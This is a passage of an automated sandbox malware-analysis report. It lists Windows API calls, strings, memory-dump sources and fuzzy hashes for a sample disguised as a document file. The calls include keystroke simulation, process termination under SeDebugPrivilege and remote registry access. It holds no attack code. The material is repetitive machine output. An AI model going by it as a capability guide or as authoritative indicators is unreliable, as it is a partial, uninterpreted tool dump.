                                                        • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,0078E9A0,00000004,00000000,00000000), ref: 0072F77E
                                                        • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,0078E9A0,00000004,00000000,00000000), ref: 0078EB55
                                                        • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0078E9A0,00000004,00000000,00000000), ref: 0078EBC1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: ShowWindow
                                                        • String ID:
                                                        • API String ID: 1268545403-0
                                                        • Opcode ID: b70a5791e612cd7e9f052b08fff125a096e2bb75d3ede4ca3fd04d218fb12917
                                                        • Instruction ID: 18d74ef9319198916e14efcbd397ce9fa24353d13481003c41ff9c05df536581
                                                        • Opcode Fuzzy Hash: b70a5791e612cd7e9f052b08fff125a096e2bb75d3ede4ca3fd04d218fb12917
                                                        • Instruction Fuzzy Hash: 44412871204690EBEB355738ACC8B7A7FB5AB45311FA8483EE48B82761C77CE881D715
                                                        APIs
                                                          • Part of subcall function 0074E138: GetWindowThreadProcessId.USER32(?,00000000), ref: 0074E158
                                                          • Part of subcall function 0074E138: GetCurrentThreadId.KERNEL32 ref: 0074E15F
                                                          • Part of subcall function 0074E138: AttachThreadInput.USER32(00000000,?,0074CDFB,?,00000001), ref: 0074E166
                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 0074CE06
                                                        • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 0074CE23
                                                        • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 0074CE26
                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 0074CE2F
                                                        • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 0074CE4D
                                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0074CE50
                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 0074CE59
                                                        • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 0074CE70
                                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0074CE73
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                        • String ID:
                                                        • API String ID: 2014098862-0
                                                        • Opcode ID: 55f902d4e2163d80a556bcbb6214771211cb5780e39eacbd4200a7b7895aca43
                                                        • Instruction ID: 63a0a9d167240e464b192c9426fcb7fc6302cc6381c411e7f942a014c85d6bf5
                                                        • Opcode Fuzzy Hash: 55f902d4e2163d80a556bcbb6214771211cb5780e39eacbd4200a7b7895aca43
                                                        • Instruction Fuzzy Hash: 9811C8B255061CBFF7216F648C8EF5E7A2DDB48794F510416F3406B1E0CAF65C419AA8
                                                        APIs
                                                          • Part of subcall function 0074A857: CLSIDFromProgID.COMBASE ref: 0074A874
                                                          • Part of subcall function 0074A857: ProgIDFromCLSID.COMBASE(?,00000000), ref: 0074A88F
                                                          • Part of subcall function 0074A857: lstrcmpiW.KERNEL32(?,00000000), ref: 0074A89D
                                                          • Part of subcall function 0074A857: CoTaskMemFree.COMBASE(00000000), ref: 0074A8AD
                                                        • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0076C6AD
                                                        • _memset.LIBCMT ref: 0076C6BA
                                                        • _memset.LIBCMT ref: 0076C7D8
                                                        • CoCreateInstanceEx.COMBASE(?,00000000,00000015,?,00000001,00000001), ref: 0076C804
                                                        • CoTaskMemFree.COMBASE(?), ref: 0076C80F
                                                        Strings
                                                        • NULL Pointer assignment, xrefs: 0076C85D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                        • String ID: NULL Pointer assignment
                                                        • API String ID: 1300414916-2785691316
                                                        • Opcode ID: 5b81e0cb01a2866172d75f2ba0ba75c730da7df88bcb648d794d8ba68985f99b
                                                        • Instruction ID: 51f9e8511fcd972e2858bbc45fc2ad1c377d7c0ded4bc4265f55eef5d1f5f1a0
                                                        • Opcode Fuzzy Hash: 5b81e0cb01a2866172d75f2ba0ba75c730da7df88bcb648d794d8ba68985f99b
                                                        • Instruction Fuzzy Hash: 97913971D00219EBDB21DFA4DC85EEEBBB8AF08710F10416AF915A7281DB749A45CFA0
                                                        APIs
                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00771B09
                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 00771B17
                                                        • __wsplitpath.LIBCMT ref: 00771B45
                                                          • Part of subcall function 0073297D: __wsplitpath_helper.LIBCMT ref: 007329BD
                                                        • _wcscat.LIBCMT ref: 00771B5A
                                                        • Process32NextW.KERNEL32(00000000,?), ref: 00771BD0
                                                        • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00771BE2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                        • String ID: hE|
                                                        • API String ID: 1380811348-1832437213
                                                        • Opcode ID: 52586e077d17d380ebc30da96bf566b1935a7349bffdd1bd8a024d2bd1b8c3d3
                                                        • Instruction ID: 84cb9996593b565bb380f3b1dac7ce7e8a09586e18bc58afc38646743cc5248c
                                                        • Opcode Fuzzy Hash: 52586e077d17d380ebc30da96bf566b1935a7349bffdd1bd8a024d2bd1b8c3d3
                                                        • Instruction Fuzzy Hash: F6518171504300DFD720EF24D889EABB7E8EF88754F40491EF58997291EB34EA45CBA2
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00779926
                                                        • SendMessageW.USER32(?,00001036,00000000,?), ref: 0077993A
                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00779954
                                                        • _wcscat.LIBCMT ref: 007799AF
                                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 007799C6
                                                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 007799F4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window_wcscat
                                                        • String ID: SysListView32
                                                        • API String ID: 307300125-78025650
                                                        • Opcode ID: b7955d44d7daba8a8acb3da193706f3a7888c500d78b36438376ea2783cfab42
                                                        • Instruction ID: 34cec4ad27db4d211bbc434baad4b37770c13b3a409e82186dfd0da844e22381
                                                        • Opcode Fuzzy Hash: b7955d44d7daba8a8acb3da193706f3a7888c500d78b36438376ea2783cfab42
                                                        • Instruction Fuzzy Hash: 3E41B571900308EFEF219F64C885FEE77B8EF49390F10852AF649A7291D6799D84CB64
                                                        APIs
                                                          • Part of subcall function 00756F5B: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00756F7D
                                                          • Part of subcall function 00756F5B: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00756F8D
                                                          • Part of subcall function 00756F5B: CloseHandle.KERNEL32(00000000,?,00000000), ref: 00757022
                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0077168B
                                                        • GetLastError.KERNEL32 ref: 0077169E
                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 007716CA
                                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 00771746
                                                        • GetLastError.KERNEL32(00000000), ref: 00771751
                                                        • CloseHandle.KERNEL32(00000000), ref: 00771786
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                        • String ID: SeDebugPrivilege
                                                        • API String ID: 2533919879-2896544425
                                                        • Opcode ID: ba3c96c40538c111f72918ff38313d8b7edae4cc2d9153ec1fcd42f151ecb698
                                                        • Instruction ID: 26df0b7961169f9c3febc3b4321e2286a8df0a81904f5bf3bba7c900f83e9905
                                                        • Opcode Fuzzy Hash: ba3c96c40538c111f72918ff38313d8b7edae4cc2d9153ec1fcd42f151ecb698
                                                        • Instruction Fuzzy Hash: 4341AC75600201EFDB18EF68C8A9FAD77A5AF48741F04C049F90A9F292DBB8DD45CB81
                                                        APIs
                                                        • LoadIconW.USER32(00000000,00007F03), ref: 007562D6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: IconLoad
                                                        • String ID: blank$info$question$stop$warning
                                                        • API String ID: 2457776203-404129466
                                                        • Opcode ID: 1fae9f958bedb32ccf94e30a8b91ff8826e270435746b789b7939a43f297f735
                                                        • Instruction ID: 8a9fcb677f445efdba4eaf8298270dafe635ed470b355c68cf594b16c2e60237
                                                        • Opcode Fuzzy Hash: 1fae9f958bedb32ccf94e30a8b91ff8826e270435746b789b7939a43f297f735
                                                        • Instruction Fuzzy Hash: 3311D0B6208342BBE7055754DC47EEAB39CBF15725F50002EFD41B7282E7EC6D454165
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000100,00000000), ref: 00757595
                                                        • LoadStringW.USER32(00000000), ref: 0075759C
                                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 007575B2
                                                        • LoadStringW.USER32(00000000), ref: 007575B9
                                                        • _wprintf.LIBCMT ref: 007575DF
                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 007575FD
                                                        Strings
                                                        • %s (%d) : ==> %s: %s %s, xrefs: 007575DA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: HandleLoadModuleString$Message_wprintf
                                                        • String ID: %s (%d) : ==> %s: %s %s
                                                        • API String ID: 3648134473-3128320259
                                                        • Opcode ID: 0e5563524da500100ff23da4de2bdecaf9d1f8ff980e5fc884a1ae573236f78f
                                                        • Instruction ID: b7770825ca7811f0442659b64082a8db91eaef34c1122896c72c02939c9ee168
                                                        • Opcode Fuzzy Hash: 0e5563524da500100ff23da4de2bdecaf9d1f8ff980e5fc884a1ae573236f78f
                                                        • Instruction Fuzzy Hash: C10136F3540208BFE721A7D4ED8DEE7776CD708301F404496B746D2041EA789E858B75
                                                        APIs
                                                          • Part of subcall function 0071CAEE: _memmove.LIBCMT ref: 0071CB2F
                                                          • Part of subcall function 00773AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00772AA6,?,?), ref: 00773B0E
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00772AE7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: BuffCharConnectRegistryUpper_memmove
                                                        • String ID:
                                                        • API String ID: 3479070676-0
                                                        • Opcode ID: bf9035e0debbf2363c9a1f2b27b90983ba354b2d3095394003e63d2354033735
                                                        • Instruction ID: 99129f7289431e4d9b43b76d111f8fa4a4147136ca0a9d5cffec865f588636b0
                                                        • Opcode Fuzzy Hash: bf9035e0debbf2363c9a1f2b27b90983ba354b2d3095394003e63d2354033735
                                                        • Instruction Fuzzy Hash: C2916A71204201EFCB11EF14C895A6EB7E5FF98350F14881DF99A972A2DB38ED46CB52
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$_memmovehtonsinet_ntoaselect
                                                        • String ID:
                                                        • API String ID: 1718709218-0
                                                        • Opcode ID: a455c82552ef0a28120d43405d3c330c44e34d30ebdcb6c14ac3c17f652b5d30
                                                        • Instruction ID: 5b6017469870ec6333627b81e5e136036f8e9af6986672a92b5befadb83262b0
                                                        • Opcode Fuzzy Hash: a455c82552ef0a28120d43405d3c330c44e34d30ebdcb6c14ac3c17f652b5d30
                                                        • Instruction Fuzzy Hash: 0F71A171504200EBC714EF64DC49EABB7E8EB88720F10451DF95697291DB78DD45CBA2
                                                        APIs
                                                        • __mtinitlocknum.LIBCMT ref: 0073B744
                                                          • Part of subcall function 00738A0C: __FF_MSGBANNER.LIBCMT ref: 00738A21
                                                          • Part of subcall function 00738A0C: __NMSG_WRITE.LIBCMT ref: 00738A28
                                                          • Part of subcall function 00738A0C: __malloc_crt.LIBCMT ref: 00738A48
                                                        • __lock.LIBCMT ref: 0073B757
                                                        • __lock.LIBCMT ref: 0073B7A3
                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,007C6948,00000018,00746C2B,?,00000000,00000109), ref: 0073B7BF
                                                        • RtlEnterCriticalSection.NTDLL(8000000C), ref: 0073B7DC
                                                        • RtlLeaveCriticalSection.NTDLL(8000000C), ref: 0073B7EC
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                        • String ID:
                                                        • API String ID: 1422805418-0
                                                        • Opcode ID: 65922d76671d6838e6f5764c75bdfe52a49b86dcbcdc16e77ef7ccd52e902012
                                                        • Instruction ID: 4a9fae5648cbc6099b14982eac5a017e4d61860283eed930e1396bdb3997a423
                                                        • Opcode Fuzzy Hash: 65922d76671d6838e6f5764c75bdfe52a49b86dcbcdc16e77ef7ccd52e902012
                                                        • Instruction Fuzzy Hash: 144105B1E01215DBFB10DF68D8453ACB7B4AF41325F10821AE625AB2D3D77CA901CBD5
                                                        APIs
                                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 0075A1CE
                                                          • Part of subcall function 0073010A: std::exception::exception.LIBCMT ref: 0073013E
                                                          • Part of subcall function 0073010A: __CxxThrowException@8.LIBCMT ref: 00730153
                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 0075A205
                                                        • RtlEnterCriticalSection.NTDLL(?), ref: 0075A221
                                                        • _memmove.LIBCMT ref: 0075A26F
                                                        • _memmove.LIBCMT ref: 0075A28C
                                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 0075A29B
                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 0075A2B0
                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 0075A2CF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                        • String ID:
                                                        • API String ID: 256516436-0
                                                        • Opcode ID: 492779737747feb0738283581697d50a4cb28d09d4fba42d519be527bf59304c
                                                        • Instruction ID: 02d844087d42bd26a5df162fcc6a26a3a6ce7e8bdb51911c83f21a2d15ac3330
                                                        • Opcode Fuzzy Hash: 492779737747feb0738283581697d50a4cb28d09d4fba42d519be527bf59304c
                                                        • Instruction Fuzzy Hash: 2531A131900205EBDB10DFA4DC8AAAEB7B8FF85710F1480B5F904AB256D778DD15CBA5
                                                        APIs
                                                        • DeleteObject.GDI32(00000000), ref: 00778CF3
                                                        • GetDC.USER32(00000000), ref: 00778CFB
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00778D06
                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00778D12
                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00778D4E
                                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00778D5F
                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0077BB29,?,?,000000FF,00000000,?,000000FF,?), ref: 00778D99
                                                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00778DB9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                        • String ID:
                                                        • API String ID: 3864802216-0
                                                        • Opcode ID: ef445d8a03508ffb629bf1914809047dc82ae1abb11d4846bf7656eeaa7e6df0
                                                        • Instruction ID: 2d1e8a31b239a82f16f59b497bc37bf6aaee360d7f677162a05d2c50c635784d
                                                        • Opcode Fuzzy Hash: ef445d8a03508ffb629bf1914809047dc82ae1abb11d4846bf7656eeaa7e6df0
                                                        • Instruction Fuzzy Hash: 7D318D72240614BBEF208F51CC4AFEA3FA9EF49791F048055FE089A291DA799C42CB74
                                                        APIs
                                                          • Part of subcall function 007184A6: __swprintf.LIBCMT ref: 007184E5
                                                          • Part of subcall function 007184A6: __itow.LIBCMT ref: 00718519
                                                          • Part of subcall function 00713BCF: _wcscpy.LIBCMT ref: 00713BF2
                                                        • _wcstok.LIBCMT ref: 00761D6E
                                                        • _wcscpy.LIBCMT ref: 00761DFD
                                                        • _memset.LIBCMT ref: 00761E30
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
